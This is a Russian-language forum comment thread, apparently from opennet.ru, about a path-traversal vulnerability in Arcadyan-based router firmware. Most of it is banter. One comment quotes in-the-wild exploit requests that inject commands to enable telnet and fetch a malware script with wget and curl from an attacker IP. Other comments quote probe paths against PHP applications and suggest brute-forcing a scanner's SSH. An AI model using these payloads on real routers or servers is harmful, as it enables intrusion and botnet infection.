    Это логическая ошибка никак не связана с языком. Подобное я часто видел в самописных парсерах на разных языках.

     
     
  • 5.56, Админ Анонимов (?), 13:17, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    бл9, народ, вы вопрос читать умеете ? спросил на каком языке написан http-сервер от Arcadyan - C/С++ или какой-то другой ? а в ответ слышно всё что угодно но не ответ на вопрос, тут вообще адекватные есть ?
     
     
  • 6.59, Урри (ok), 13:33, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Адекватные тут бывают, изредка, причем всегда новички.
    А как с нами в палате потусуются, так и крыша, того.

    Но мы все же лучше тех, из соседнего корпуса, которые совсем молодые и сюда регулярно пообщаться бегают.

     
  • 5.58, another_one (ok), 13:28, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Странно, в соседней новости поливают модные языки за логические ошибки. Но, вы не понимаете, это ДРУГОЕ!
     
     
  • 6.77, Аноним (291), 14:18, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    К языку Си неприменимо понятие "логическая ошибка".
     
     
  • 7.122, Аноним (52), 17:09, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Правильно, потому что Си делает именно то, чего люди написали. Скажу компу считать первые три цифры числа пи после запятой и вываливать это в терминал - будет комп постоянно заниматься именно этим. Чукча не писатель. А потому комп просто делает то что от него требуют.
     
     
  • 8.125, Аноним (291), 17:14, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Главная проблема Си - люди пишут на нём не совсем то, что нужно сделать Почему-... текст свёрнут, показать
     
     
  • 9.201, Аноним (-), 21:35, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Да вообще-то люди это делают на всех ЯП Ну, может, кроме брефнфака - на нем за ... текст свёрнут, показать
     
  • 3.29, Урри (ok), 12:19, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • –4 +/
    На всех, кроме Раст!!11

     
  • 2.35, onanim (?), 12:42, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • –1 +/
    на Rust, обрабатывает PHP скрипты по протоколу CGI.

    вот эксплоит:

    POST /images/..%2fapply_abstract.cgi HTTP/1.1
    Connection: close
    User-Agent: Dark

    action=start_ping&submit_button=ping.html&action_params=blink_time%3D5&ARC_ping_ipaddress=212.192.241.7%0AARC_SYS_TelnetdEnable=1&%0AARC_SYS_=cd+/tmp;wget+http://212.192.241.72/lolol.sh;curl+-O+http://212.192.241.72/lolol.sh;chmod+7


    там кстати ещё один встроен, для Seagate BlackArmor NAS:

    GET /backupmgt/localJob.php?session=fail;cd+/tmp;wget+http://212.192.241.72/lolol.sh;curl+-O+http://212.192.241.72/lolol.sh;sh+lolo HTTP/1.1
    Connection: close
    Accept-Encoding: gzip, deflate
    Accept: /
    User-Agent: Dark

     
     
  • 3.36, onanim (?), 12:43, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • –1 +/
    блин, опеннет похерил разметку и обрезал длинную строку.
    сами найдёте, кому надо.
     
  • 3.51, Админ Анонимов (?), 13:10, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    >на Rust

    так а где это посмотреть на чем написана реализация http-сервера от Arcadyan ?
    я просто предположил что это C/C++ но не уверен и поэтому спросил у сообщества, но в ответ получил какие-то говновыхлопы

     
  • 2.37, Абвгдейка (?), 12:45, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Да,случайно.
    Два Си разраба начали писать на игого и растишке, но во время писанины отвлеклись на разговор и по окончании беседы обнаружили, что 99% кода написали на Си.
    Долго они потом смеялись над этой историей, да и само требование начальника чтобы был код на игого и растишке оказалось соблюдено.
     

  • 1.24, cricon (?), 12:07, 09/08/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • –1 +/
    Обожаю такие новости: мы нашли уязвимость! с её помощью можно тырить деньги, воровать продукты с холодильника и отбирать у кота рыбу - это делается вот так!!!
     
     
  • 2.33, Аноним (33), 12:40, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +2 +/
    А что такого, если ребята с опеннета подтянутся пользоваться этой уязвимостью, так у производителей роутеров появится большее желание дыры залатать.
     
     
  • 3.47, Аноним (-), 13:06, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Вот тут недавно Tor на Rust начали переписывать как раз благодаря анонимам с опеннета, так что - дерзайте!!
     
     
  • 4.49, Аноним (52), 13:08, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Скоро заценим есть ли жизнь на расте. Учитывая то с какой регулярностью ломают аппаратное декодирование в браузерах версия на Си сохранится как минимум еще очень долго.
     
     
  • 5.290, Аноним (291), 10:25, 11/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    А в торбраузере кто-то парится из-за аппаратного декодирования? Это ж небезопасно.
     
  • 4.168, Аноним (-), 19:26, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • –1 +/
    > Вот тут недавно Tor на Rust начали переписывать как раз благодаря анонимам
    > с опеннета, так что - дерзайте!!

    Недавно - это примерно года три назад? Так, если дерево сорцов позырить, потуги не очень новые.

     
  • 2.90, Juha (ok), 14:58, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Для этого надо зайти под root с полными правами и .....
     

  • 1.30, Урри (ok), 12:23, 09/08/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • –1 +/
    Ко мне такие еще не стучались, но это просто так, потрындеть.

    Зацените, кстати, какие школьники иногда стучатся:
    GET////remote/fgt_lang?lang=/../../../..//////////dev/

    Юзерагент зачетненький: python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.31.1.el7.x86_64, и айпишечка заодно: 45.95.147.15

     
     
  • 2.46, Аноним (-), 13:04, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Если к вам регулярно стучатся школьники, значит, с вашим именем сети (HalyavnyiInternet) или роутером что-то не так.
     
     
  • 3.48, Аноним (52), 13:07, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Воспитанные школьники стучатся. А не очень воспитанные сразу все отбирают.
     
     
  • 4.64, Урри (ok), 13:36, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Пытаются, пока только пытаются:

    GET//vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
    GET//index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21
    GET//?XDEBUG_SESSION_START=phpstorm
    GET//wp-content/plugins/wp-file-manager/readme.txt
    и т.д.

     
     
  • 5.219, Ananimasss (?), 00:33, 10/08/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Больше похоже на ботнет, который переодически сканирует на уязвимости или неправильно настроенные вротпрессы.
     
  • 3.61, Урри (ok), 13:35, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Ну да, с роутером действительно не так - он к интернету подключен.
    Вот если отключить, то и ломиться никто не будет.
     
     
  • 4.170, Аноним (-), 19:41, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    > Вот если отключить, то и ломиться никто не будет.

    Некоторые так и делают. Ставят открытую точку доступа, на отключенном роутере. Черт знает, троллинг любителей халявы наверное такой.

     
     
  • 5.194, Атон (?), 21:14, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    так это ты каждый раз покупаешься на эту шутку?
     
     
  • 6.197, Аноним (-), 21:24, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    > так это ты каждый раз покупаешься на эту шутку?

    А, так это ты был? Ну тогда я тебе в следующий раз бутлоадер снесу, чтобы ты не скучал.

     
     
  • 7.205, Атон (?), 21:40, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • –1 +/
    я уже баюсь
     
  • 2.169, Аноним (-), 19:40, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    > Юзерагент зачетненький: python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.31.1.el7.x86_64,
    > и айпишечка заодно: 45.95.147.15

    Что это за костяшки мамонта? Бомж нашел на помойке сервер? Так то у него openssh там светится. Может его сломали и это просто бот? Если не бот - ну, запусти ему туда брут ssh, для симметрии. Даже если ничерта не сбрутится, нагрузка на проц не оставит его равнодушным, если там RSA.

     

  • 1.34, Аноним (34), 12:40, 09/08/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Что, неужели ДырЛинк не задет? :) Прям удивлен.
     
     
  • 2.43, Аноним (-), 12:59, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Мой ДырЛинк! Врага в тыл не пущу, сервер отключу!
    ...
    Стоп, тут это невозможно сделать?
     
  • 2.100, Аноним (-), 15:19, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    > Что, неужели ДырЛинк не задет? :)

    Задет:

    > Starting June 6, 2021, and through July 23, we have noticed this threat actor start exploiting other vulnerabilities:
    > 1. CVE-2020-29557 (DLink routers)

    https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2

     
     
  • 3.101, Аноним (-), 15:20, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    021-20090-exploited-in-the-wild
     
  • 2.114, Аноним (34), 16:50, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Тот, на котором ты явно не умеешь писать.
     
     
  • 3.117, Нанобот (ok), 17:02, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Фортран? Алгол? Пролог? Брейнфак? Я теряюсь в догадках...
     
     
  • 4.128, Аноним (108), 17:17, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +4 +/
    Очевидно, что любой
     

  • 1.87, Аноним (87), 14:52, 09/08/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    > ADSL

    А в dialup модемах ничего опасного не нашли? Если серьезно, уже лет 10 не слышал о них.

     
     
  • 2.109, Аноним (-), 15:57, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +2 +/
    есть области аномальной топологии с медью на последней миле, а веризон в 2020 ещё мигрировал и планировал. так-то контра повырубала, конечно.
     
  • 2.134, Аноним (-), 17:26, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Попробуй из JS сделать XHR на что-нибудь типа https whatever ATH0 какое-ниб... большой текст свёрнут, показать
     
     
  • 3.182, Аноним (-), 20:51, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    FAIL: https => http:// конечно. Шифрование все портит.
     
  • 3.213, Онаним (?), 22:57, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Да хрен там, даже в хейесах был ATS2=255, и управление по DTR.
    +++ это дебажный сиквенс, нормальные звонилки данных его в совместимых модемах умели выключать.
     
     
  • 4.243, Аноним (-), 11:56, 10/08/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    У большинства юзеров все это ессно не сделано И работает Иногда даже сейчас, х... большой текст свёрнут, показать
     
     
  • 5.252, Онаним (?), 13:59, 10/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Ну он дебажный потому, что сделан для ручного терминального режима, или когда нет сигнала DTR, чтобы коннект прибить, когда станет необходимо. В автоматическом же режиме коннект через DTR прибивается коннект целиком.

    А так да, многие дефолтные строки инициализации прибивали, и в итоге оно работало, согласен.

     
     
  • 6.263, Аноним (-), 18:25, 10/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    > Ну он дебажный потому, что сделан для ручного терминального режима, или когда
    > нет сигнала DTR, чтобы коннект прибить, когда станет необходимо. В автоматическом
    > же режиме коннект через DTR прибивается коннект целиком.

    DTR сам по себе +++ не вырубал вроде. И это работало. Ну как, я делал вебпагу которая меня спихивала. Это было давно и настройки были обычные которые виндовый диалап юзал.

    > А так да, многие дефолтные строки инициализации прибивали, и в итоге оно
    > работало, согласен.

    Да оно так то меня сшибало при тестах в виндовом диалапе. Команды там те которые он скармливал. По DTR отвал там был но реакция на +++ насколько я помню была, и даже сам диалап пытался этим пользоваться.

     
     
  • 7.268, Онаним (?), 21:04, 10/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    > DTR сам по себе +++ не вырубал вроде.

    Угу. S2=255 обязательно. Имелось в виду, что при наличии DTR +++ уже не нужен.

    > И это работало.

    Работало, факт.

     
  • 5.305, пох. (?), 14:07, 11/08/2021 [^] [^^] [^^^] [ответить]  
  • –2 +/
    да, там какие-то идиоты на полном серьезе заявили вероятность подобной последов... большой текст свёрнут, показать
     
  • 3.154, пох. (?), 18:20, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • –2 +/
    просто правильно выбирай маршруты отхода и жалобу, жалобу в роснадзор По мурма... большой текст свёрнут, показать
     
     
  • 4.172, YetAnotherOnanym (ok), 20:06, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Радости с того 4g, если qos там отстроен так, что у пацанчика на соседнем кресле ютуб играет ровненько, у барышни рядом инстаграмчик тоже летает, а тебе на какой-нибудь стаковерфлоу зайти или, там, госуслуги - воот такой хрен.
     
     
  • 5.178, Онаним (?), 20:37, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Ничего, ща ещё UDP'шный QUIC добавят, и ютуб с инстаграмчиком окончательно порвут любой QoS на ссаные тряпки. deny udp eq 80/443 в мобильных сетях войдёт в моду очень быстро.
     
     
  • 6.179, Аноним (291), 20:41, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    > udp 80

    Наноэксперт из Сколково стремительно врывается в дискуссию!

     
     
  • 7.212, Онаним (?), 22:49, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    На всякий случай, от греха подальше.
    Ибо нефиг.
     
  • 7.214, Онаним (?), 23:06, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    [вкрадчиво] А зачем вам UDP 80? :D
     
  • 7.216, Онаним (?), 23:12, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Ну и ты меня блджад уел, я аж гуглить пошёл - откуда у меня в голове такое стойкое за порт 80.
    Оказалось да, я видимо это уже читал. Ну и не мог я поверить, что эти архаровцы его не займут.

    Короче...

    https://www.ietf.org/proceedings/88/slides/slides-88-tsvarea-10.pdf

    Ищи port 80.

    Такие вот тапки. Там у них на него разные были планы, включая разделение на in/out, но в итоге можно быть на 146% уверенным, что 80 без работы не останется.

     
     
  • 8.285, Аноним (291), 10:10, 11/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Очень актуально А у нас в 2021 реальные HTTP 3 серваки, типа caddy и nginx-quic... текст свёрнут, показать
     
     
  • 9.293, Онаним (?), 10:56, 11/08/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Ключевое слово у нас Это не значит, что у других те же планы ... текст свёрнут, показать
     
  • 6.224, YetAnotherOnanym (ok), 06:22, 10/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    > Ничего, ща ещё UDP'шный QUIC добавят, и ютуб с инстаграмчиком окончательно порвут
    > любой QoS на ссаные тряпки. deny udp eq 80/443 в мобильных
    > сетях войдёт в моду очень быстро.

    Нифига. Хаватели развлекухи - основная ЦА мобильного интернета и основной источник дохода опсосов. Они уже сейчас дают на соцсети и мессенджеры безлимит, а на прочие ресурсы - дулю. И дальше будет хуже. Баранам, которые стадом идут туда, где их будут стричь - всё, всяким отщепенцам - крохи, которые останутся.

     
     
  • 7.248, пох. (?), 13:02, 10/08/2021 [^] [^^] [^^^] [ответить]  
  • –1 +/
    > Нифига. Хаватели развлекухи - основная ЦА мобильного интернета и основной источник дохода

    ни разу.

    > опсосов. Они уже сейчас дают на соцсети и мессенджеры безлимит, а

    потому что соцсети и мессенджеры это _коммуникации_ а ни разу не "развлекуха".
    За ютубчик будешь платить.

     
     
  • 8.269, YetAnotherOnanym (ok), 21:32, 10/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Ой, можно подумать, хомячки через соцсети не развлекухой обмениваются Те же рол... текст свёрнут, показать
     
     
  • 9.274, пох. (?), 21:58, 10/08/2021 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Можно подумать, телефоном пользуются только тетяклава и ее кумушка Нет, не пове... текст свёрнут, показать
     

     ....большая нить свёрнута, показать (22)

  • 1.91, YetAnotherOnanym (ok), 14:58, 09/08/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Санитизация? Нет, не слышали...
     
  • 1.127, Аноним (-), 17:17, 09/08/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    > http://212.192.241.72/lolol.sh

    О, круто, живая малварь в дикой природе. И упаси вас это запускать. Впрочем, оно только 32-битный x86 умеет кажись. И кучу кроссплатформенного добра вплоть до аж sh4 какого.

     
     
  • 2.150, пох. (?), 18:12, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    >> http://212.192.241.72/lolol.sh
    > О, круто, живая малварь в дикой природе. И упаси вас это запускать.

    Чего это вдруг? Очень полезная и нужная малварь. Вон сколько троянцев пытается прибить перед установкой своего. Попутно прикрывает уязвимые порты от злых хакеров (если найдет немодный-устаревший iptables) и убивает уязвимые вредные сервисы.

    > Впрочем, оно только 32-битный x86 умеет кажись.

    в смысле, оно только 64bit native x86 и не умеет (видимо, надеется что и так запустится через 32бит прослойку)
    а так все возможные и невозможные армы и мипсы.

    > вплоть до аж sh4 какого.

    во-во.

    Только я не понял iptables-save в конце - это оно на какой-то глюк рассчитывает или это фича или отвалился хвост файла?


     
     
  • 3.175, Аноним (-), 20:29, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Найдет, найдет Сварщик, конечно, не настоящий - аплет бизибокса лайтовенький, н... большой текст свёрнут, показать
     
     
  • 4.228, пох. (?), 09:23, 10/08/2021 [^] [^^] [^^^] [ответить]  
  • –1 +/
    как будто у него не найдется 32битного ld so почем, говорите, нонче idapro ... большой текст свёрнут, показать
     
     
  • 5.250, Аноним (-), 13:30, 10/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    А кто знает Я даже его систему не знаю х64 бинарник почищен Видимо не совсем ... большой текст свёрнут, показать
     
  • 2.174, Онаним (?), 20:27, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    SH4 это забавная зверюга. Это хитачевский SuperH, который ныне делают Renesas и STM, то есть да, в качестве целей явно значатся промышленные сети ("ну, типа IoT") в т.ч. и малые роутеры внутри таковых.
     

  • 1.148, Аноньимъ (ok), 18:11, 09/08/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Огласите весь список роутеров пожалуйста.
     
     
  • 2.173, Онаним (?), 20:18, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    https://securityaffairs.co/wordpress/120908/hacking/cve-2021-20090-iot-attacks
     
     
  • 3.217, Аноньимъ (ok), 23:24, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    > https://securityaffairs.co/wordpress/120908/hacking/cve-2021-20090-iot-attacks
    >wordpress

    Там живой троян мне в браузер полезет? Страшно как-то.

     
     
  • 4.218, Онаним (?), 23:25, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    А ты его в гугл транслейт, пусть гуглу лезет :D
     
     
  • 5.229, пох. (?), 09:25, 10/08/2021 [^] [^^] [^^^] [ответить]  
  • –1 +/
    > А ты его в гугл транслейт, пусть гуглу лезет :D

    ты ему вредные советы-то не давай, он же нам гугля сломает.

     
     
  • 6.244, Аноньимъ (ok), 12:00, 10/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Загрузил не через трансллейт, а напрямую через гугол.
    Ждите пылающих датацентров.
     
     
  • 7.301, Онаним (?), 13:40, 11/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Последняя VPS для загрузки в OVH была, да? :)
     
  • 3.245, Аноньимъ (ok), 12:01, 10/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Что-то список маленький удивительно.

    Они туда "устаревшие" железки без поддержки видимо не включили.

     

  • 1.176, Аноним (181), 20:31, 09/08/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    О, моё любимое. Очередной вагон не обновляемых домашних коробочек, куда напихали свистелок и перделок, а также backdoor и bloatware. Mmmm, delicious.
     
     
  • 2.183, Аноним (183), 20:54, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Так то ты в своем праве обучить хомячков азам консоли. Или даже выезжать настраивать им роутер. Но, правда, денег за это тебе никто не заплатит.
     
     
  • 3.187, Аноним (181), 21:06, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    А я и не собираюсь ничем подобным заниматься. :) Несовершенство этого мира, жадность и шпионство корпораций, нехватка знаний большинства населения, воровство хакеров - я воспринимаю как повод повеселиться на эту тему. Кстати, да, есть пару IT-профессий (support, InfoSec и хакеры), которые на этих проблемах делают деньги, а ряд людей в итоге учат что-то новое(OpenWRT/Linux, OPNsense/FreeBSD, настройка/админство сетей) и покупают приличное железо. Экономика растёт, позитив же. :)
     
     
  • 4.230, пох. (?), 09:30, 10/08/2021 [^] [^^] [^^^] [ответить]  
  • –2 +/
    > есть пару IT-профессий (support, InfoSec и хакеры), которые на этих проблемах
    > делают деньги

    есть пара не-ит профессиий - наркомафия, товарищмайоры-борцуны-с-наркомафией у нее же на зарплате, , продавцы и производители метадона, наконец, которые делают гораздо лучшие и большие деньги. Иногда садятся на недетские сроки, но чаще прокатывает. Последнюю категорию могут еще и наградить, за трудовой подвиг.
    А ряд людей в итоге учится чему-то новому - как бороться с героиновым отходняком, например. И покупают приличные препараты. Экономика... ну так себе, если честно... Да и с позитивом на хмуром не очень.

    А можно и просто квартиры обносить. Ряд людей (потупее) научится новому, дверь себе купит поприличнее. Поумнее - уедут туда где квартиры обносить не принято.

     
     
  • 5.242, Аноним (181), 11:55, 10/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    сравнил хрен с пальцем.
     
     
  • 6.249, пох. (?), 13:07, 10/08/2021 [^] [^^] [^^^] [ответить]  
  • –2 +/
    > сравнил хрен с пальцем.

    думаешь, квалификации среднего "кульхацкера" не хватит даже куст коки до приличного размера вырастить? Хм... может ты и прав. А если два раза в день пороть? Хм, тоже нет, привыкшие оне?

    Хмм... а, вот, придумал: "если с твоего куста не удастся срезать лист нормального размера -  отрежем пальчик уже тебе". Мне кажется, должно работать!

     

  • 1.184, Аноним (181), 20:57, 09/08/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Народ, всё бросайте, есть лучший коммент! :) Из избранного: "в настройках роутера. Там есть от 10 до 100 миллиампер настройка... Учи физику." https://www.opennet.ru/openforum/vsluhforumID3/125002.html#116
     
     
  • 2.210, Аноним (52), 22:23, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Ну так. Настрой децибеллы напрямую не трогая подаваемое напряжение.
     
     
  • 3.330, Аноним (291), 14:15, 12/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    В волноводе вообще понятия напряжения и тока весьма эфемерны и сильно зависят от координаты и времени.
    Если там бегущая волна - традиционными для низких частот методами ее характеризовать весьма неудобно.
     

  • 1.193, Аноним (193), 21:13, 09/08/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    А ничего что для этого "взлома" нужно доступ к ВЕБ иметь, который закрыть у всех роутеров по умолчанию на WAN порту?

    То есть что бы "взломать" роутер, мне нужно подключится к нему по вайфай или по кабелю...

    и зачем что-то ломать, если в 99% случаев пароль будет админ/админ :)

     
     
  • 2.220, hefenud (ok), 00:44, 10/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    > А ничего что для этого "взлома" нужно доступ к ВЕБ иметь, который
    > закрыть у всех роутеров по умолчанию на WAN порту?
    > То есть что бы "взломать" роутер, мне нужно подключится к нему по
    > вайфай или по кабелю...
    > и зачем что-то ломать, если в 99% случаев пароль будет админ/админ :)

    Это ты с провайдерскими не сталкивался, на провайдерских очень часто оно в WAN светит, что бы попингуй первой линии мог зайти к юзеру и все починить/сломать

     
     
  • 3.246, Аноним (193), 12:11, 10/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    На пинги отвечает, но это все. Уже много лет более 5 все ВАНы по умолчанию закрыты и все операторы даже тесты на это делают (сканируют ВАН на открытость портов).
     
     
  • 4.247, hefenud (ok), 12:24, 10/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    А в новости прямо говорится обратное…
     
     
  • 5.256, Аноним (193), 14:15, 10/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Новость говорит именно об этом. Там даже IP из внутренней сети 192.168. xxxx с которых можно "взломать" роутер.
     
     
  • 6.270, hefenud (ok), 21:35, 10/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Читай: «Судя по динамике распространения атаки многие операторы оставляют на своих устройствах доступ из внешней сети для упрощения диагностики проблем службой поддержки»
     
  • 4.264, Аноним (183), 18:34, 10/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    > На пинги отвечает, но это все. Уже много лет более 5 все
    > ВАНы по умолчанию закрыты и все операторы даже тесты на это
    > делают (сканируют ВАН на открытость портов).

    Очень странно, что же тогда атакует сабж?

     
     
  • 5.265, Аноним (265), 20:15, 10/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    мсье не знает о том, что помимо ДС (дефолтной страны) есть ещё две с половиной сотни других стран.
     
     
  • 6.266, Аноним (265), 20:16, 10/08/2021 [^] [^^] [^^^] [ответить]  
  • +2 +/
    в России, кстати, десятки тысяч роутеров с торчащей в интернет голой жопой.
     
     
  • 7.289, Аноним (291), 10:23, 11/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    > в России, кстати, десятки тысяч роутеров с торчащей в интернет голой жопой.

    Огласите хотя бы тысячу адресов, пожалуйста.

     
     
  • 8.321, Аноним (321), 19:41, 11/08/2021 [^] [^^] [^^^] [ответить]  
  • +2 +/
    google как пользоваться masscan google где найти адвоката по 272... текст свёрнут, показать
     
  • 5.278, Аноним (193), 22:46, 10/08/2021 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Да ничего и не атакует, просто хайповая новость о том что нашли дыру, которая и так была (пароли по умолчанию никто годами не меняет). А что бы установить эксплойт нужно прямое подключение к роутеру через ЛАН или Вай Фай...

     

  • 1.298, Gogi (??), 12:44, 11/08/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    "но использование комбинации "..%2f" пропускается" - да что за дебилы сидят и программируют?!!?!?!?! Неужели ПРОШИВКА, самый топ профессиональной деятельности, делается студотой?!
     
     
  • 2.304, пох. (?), 13:44, 11/08/2021 [^] [^^] [^^^] [ответить]  
  • –1 +/
    > "но использование комбинации "..%2f" пропускается" - да что за дебилы сидят и
    > программируют?!!?!?!?! Неужели ПРОШИВКА, самый топ профессиональной деятельности, делается
    > студотой?!

    конечно, кому еще наколенный линуксный софт ковырять захочется?

    Хотите хорошо - в вашем хорошо не должно быть линукса.

     
  • 2.320, Аноним (321), 19:40, 11/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    на большинстве роутеров веб-интерфейс написан на PHP.
    не шучу.
     
     
  • 3.326, пох. (?), 11:25, 12/08/2021 [^] [^^] [^^^] [ответить]  
  • –2 +/
    > на большинстве роутеров веб-интерфейс написан на PHP.
    > не шучу.

    угу, не шутит - просто идиот.

     
     
  • 4.331, onanim (?), 14:20, 12/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    если в вашей цыське, занимающей дай бох 3% всего рынка, веб-интерфейс не на PHP, это ещё не означает, что я идиот.
     

     Добавить комментарий
    Имя:
    E-Mail:
    Текст:
    При перепечатке указание ссылки на opennet.ru обязательно



    Спонсоры:
    Inferno Solutions
    Hosting by Hoster.ru
    Хостинг:

    Закладки на сайте
    Проследить за страницей
    Created 1996-2021 by Maxim Chirkov
    Добавить, Поддержать, Вебмастеру